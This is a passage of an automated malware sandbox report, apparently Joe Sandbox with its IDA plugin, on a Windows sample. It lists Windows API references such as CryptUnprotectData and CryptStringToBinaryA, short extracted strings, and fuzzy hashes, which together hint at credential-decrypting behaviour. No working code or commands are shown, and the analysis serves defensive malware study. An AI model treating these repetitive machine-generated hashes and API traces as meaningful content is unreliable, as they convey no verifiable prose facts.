                              • Opcode Fuzzy Hash: 2ac7f57dbee9ba5420ccd759e54afd65c5f7ecbd9f49eae0c3ec9ecf75d8f2b8
                              • Instruction Fuzzy Hash: 43B2E6F360C604AFE3046E2DEC8567AB7E9EF94720F1A492DE6C4C3744EA3598058797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Jm_$Rtgy$dpu$xKou
                              • API String ID: 0-1908264721
                              • Opcode ID: 35808c72787d475e39b94e064de5b91c31d9f77c4bf25fbb9d9db2a99538ffd6
                              • Instruction ID: 2dc02d374f5024342ddb02ba8f9be50b8dac32565393f48d06889a4bfe7661dc
                              • Opcode Fuzzy Hash: 35808c72787d475e39b94e064de5b91c31d9f77c4bf25fbb9d9db2a99538ffd6
                              • Instruction Fuzzy Hash: 23B206F3A0C2049FE3046F29EC8567ABBE9EF94720F1A4A3DE6C5C3744E67558018697
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,008151D4,40000001,00000000,00000000,?,008151D4), ref: 00829050
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 28aaa3427e7eecc809587d97519f8a5ea29d3631b14055b8ba90cbade01a0041
                              • Instruction ID: 61146dbc917f6af8115b4d29ea4f4c148fb47596a585a09c2ca0bc7fda26279c
                              • Opcode Fuzzy Hash: 28aaa3427e7eecc809587d97519f8a5ea29d3631b14055b8ba90cbade01a0041
                              • Instruction Fuzzy Hash: 821106B0204618FFDF00CF94E894FAA33A9FF89314F108448FA59CB250D771E9828BA0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A23F
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00814F3E,00000000,?), ref: 0081A251
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00814F3E,00000000,00000000), ref: 0081A27A
                              • LocalFree.KERNEL32(?,?,?,?,00814F3E,00000000,?), ref: 0081A28F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 69f62616e21a0fc0edd36188bc2d4aec6ab6984d764635a0e66d6daa8dec6cc9
                              • Instruction ID: 5e563375a98328d03df6f3ff7d9e3df7422407d351a14b808639fa4c46ab10e9
                              • Opcode Fuzzy Hash: 69f62616e21a0fc0edd36188bc2d4aec6ab6984d764635a0e66d6daa8dec6cc9
                              • Instruction Fuzzy Hash: 831196B4641308AFEB15CF94CC95FAA77B9FB49B10F208458FA159F290C772A941CB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,015FDB78,00000000,?,00830DF8,00000000,?,00000000,00000000), ref: 00827BF3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827BFA
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,015FDB78,00000000,?,00830DF8,00000000,?,00000000,00000000,?), ref: 00827C0D
                              • wsprintfA.USER32 ref: 00827C47
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 8c5b8eaf3e45409b6f3a292e4547f0bf573041cc8330a3fa237142a4e4d5760b
                              • Instruction ID: 1b1721ff67bae8709bdd2f7625928b7422c8957bd7bd492895a3a1db30d6e313
                              • Opcode Fuzzy Hash: 8c5b8eaf3e45409b6f3a292e4547f0bf573041cc8330a3fa237142a4e4d5760b
                              • Instruction Fuzzy Hash: 7A118EB1909228EBEB20CBA4EC45FA9BB78FB44711F100395F619E73D0D7741A808F50
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /R"#$A,y{$'6
                              • API String ID: 0-1578560285
                              • Opcode ID: c3f2f61e2fb9ebb6f04560fd0b6ece146a64806e3825492c57dc173b45193471
                              • Instruction ID: bb61cd35b31ba5cd307ebae04824399dc81ff8c0201f871a16e5c100e607d86f
                              • Opcode Fuzzy Hash: c3f2f61e2fb9ebb6f04560fd0b6ece146a64806e3825492c57dc173b45193471
                              • Instruction Fuzzy Hash: 47B2E4F390C2149FE314AE2DEC8567ABBE9EF94720F1A492DEAC4C3740E63558008797
                              APIs
                              • CoCreateInstance.COMBASE(0082E120,00000000,00000001,0082E110,00000000), ref: 008239A8
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00823A00
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: ee4ab6115a6702da89a13278d73259e94d6f7047a0b3ec4891b39e9c2a1961b2
                              • Instruction ID: a2f9e8c2e117154508907fe156d7db205d882a2c7f83c0a9ab70620c476a3622
                              • Opcode Fuzzy Hash: ee4ab6115a6702da89a13278d73259e94d6f7047a0b3ec4891b39e9c2a1961b2
                              • Instruction Fuzzy Hash: F241E670A00A289FDB24DB58DC95B9BB7B5FB48702F4041D8A619EB2D0E7B16EC5CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0081A2D4
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0081A2F3
                              • LocalFree.KERNEL32(?), ref: 0081A323
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 91925d89e90fa8bcfbd2b9bc1bfb64102c33c2cf3894cbe207a36a20b3c51ba0
                              • Instruction ID: 638a599144b36c18c277cd55c480f0b6144597f682a59749cf5db557231c1c59
                              • Opcode Fuzzy Hash: 91925d89e90fa8bcfbd2b9bc1bfb64102c33c2cf3894cbe207a36a20b3c51ba0
                              • Instruction Fuzzy Hash: 1111A5B8A00209EFCB04DFA8D985AAEB7B9FF89300F104559ED15AB350D770AE51CB61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0i$'K/
                              • API String ID: 0-2984406571
                              • Opcode ID: b805caebdd3f22d885c3aac6365ce9b10512d6123e71ce0e2d155590eb670420
                              • Instruction ID: b5db91c65652c4b7834468f15030edf009b0fb6c7e716685e8d21d435963db51
                              • Opcode Fuzzy Hash: b805caebdd3f22d885c3aac6365ce9b10512d6123e71ce0e2d155590eb670420
                              • Instruction Fuzzy Hash: DDB227F360C2049FE304AE2DEC8567AFBE5EFD4720F1A893DE6C487744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?$__ZN
                              • API String ID: 0-1427190319
                              • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction ID: 41edb99a7aa50292ffcd79ead91b14099a717544268c7f26eacfb9b1d9756257
                              • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                              • Instruction Fuzzy Hash: 76723472908B159BD714EF18C89066ABBE2FFD5320F598A1DF8A5DB291D370DC41CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Qq=$g=}
                              • API String ID: 0-2701108894
                              • Opcode ID: e83e1dcb9d28d531a38eced25b097cf0bca556c2a469e13d67593eafd528dc60
                              • Instruction ID: 2e3d611c02cd99b118f6a54a3d595a6696e6fc67513a0f6e010f5452ad2ce582
                              • Opcode Fuzzy Hash: e83e1dcb9d28d531a38eced25b097cf0bca556c2a469e13d67593eafd528dc60
                              • Instruction Fuzzy Hash: 4E515AF7E587185BE304693DEC993297A96CBD0320F2B833DDA9897BC8ED3958054281
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: xn--
                              • API String ID: 0-2826155999
                              • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction ID: 86e3dc768efb9fc4811518acc1d11f1db2197823874dcd63d4b31a42057db342
                              • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                              • Instruction Fuzzy Hash: FDA226B1C002A88AEF18CB68C8903FDB7B1FF55304F1A42AAD456FB281E7755E95CB51
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction ID: cb24c49143a79e31ece087be0f60b362746dc8d34866360504420b91cbbe3a17
                              • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                              • Instruction Fuzzy Hash: 09E1EF316087459FC724DE28C8917AEB7E2FF8A300F564A2DE5D9DB291DB319845CB82
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction ID: 31fbd254756738092732a99815abc5fd91f90cc686b4178b4d06fe75866c7c98
                              • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                              • Instruction Fuzzy Hash: 52E1C231A083159FCB24CE58C8817AEB7E6FFC5314F16992DE989DB251D730AC458B86
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: UNC\
                              • API String ID: 0-505053535
                              • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction ID: 893a257417238402722941b796c4e8a1a9da198fbebfafd01ba7960518edcb30
                              • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                              • Instruction Fuzzy Hash: BCE1FA71D046698EDB108F18C8843BEBBE2FB99318F19C1A9D46CDB295D735CD46CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: VMi?
                              • API String ID: 0-3040439330
                              • Opcode ID: 7cedd77f8e5990a416b0fc800d93b0824c62a30f5df1b09238d547efa637cf1e
                              • Instruction ID: 440af088353aae2dba8d076cda715184ed8454e5c007e35286936439959ca90f
                              • Opcode Fuzzy Hash: 7cedd77f8e5990a416b0fc800d93b0824c62a30f5df1b09238d547efa637cf1e
                              • Instruction Fuzzy Hash: C46127F3B092105FF3089A29ED9577AB795EBC4320F1A813EEAC487784E9795C0582C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Hpst
                              • API String ID: 0-2020563086
                              • Opcode ID: 4ead5e9401a0864509bc0251d41fdef3633b77a9a950d0ea680c34735247a9ea
                              • Instruction ID: aa23c7da2d8523375aa18e83a57d20cb4f5bce9e08a237beee1d183fb3568ec1
                              • Opcode Fuzzy Hash: 4ead5e9401a0864509bc0251d41fdef3633b77a9a950d0ea680c34735247a9ea
                              • Instruction Fuzzy Hash: 4D515AF350C241DFC2086A3BDDD5A3A7B9AEBD8750F35492EE0C3C6644F63144439652
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $x_
                              • API String ID: 0-136925393
                              • Opcode ID: 19f9d4499635df9b8b5c2fb975bea78e89ca65ba83bb8c9c2bd329a4d4a1272f
                              • Instruction ID: 2f94a16de2a7a4e951fe680d24ed60edcb52a491d01813cdb2bd2b1ee991f599
                              • Opcode Fuzzy Hash: 19f9d4499635df9b8b5c2fb975bea78e89ca65ba83bb8c9c2bd329a4d4a1272f
                              • Instruction Fuzzy Hash: 695126B26083049FF300AE29DC8577BB3D9EB94720F29853DDAC493784E939AC058786
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "k]v
                              • API String ID: 0-3649989496
                              • Opcode ID: c6a62dafff758eadfe7b69ab8773627634eb4f3247a72482e3b2ceeb43ae6f60
                              • Instruction ID: c514628b4f49443df3e6543e86174484c61aac096447770871eda8a7e70dcfde
                              • Opcode Fuzzy Hash: c6a62dafff758eadfe7b69ab8773627634eb4f3247a72482e3b2ceeb43ae6f60
                              • Instruction Fuzzy Hash: 085166B361C3189FE3046E3CEC9977AB7D4EB54324F1A493EEAC1C7780EA7558018686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
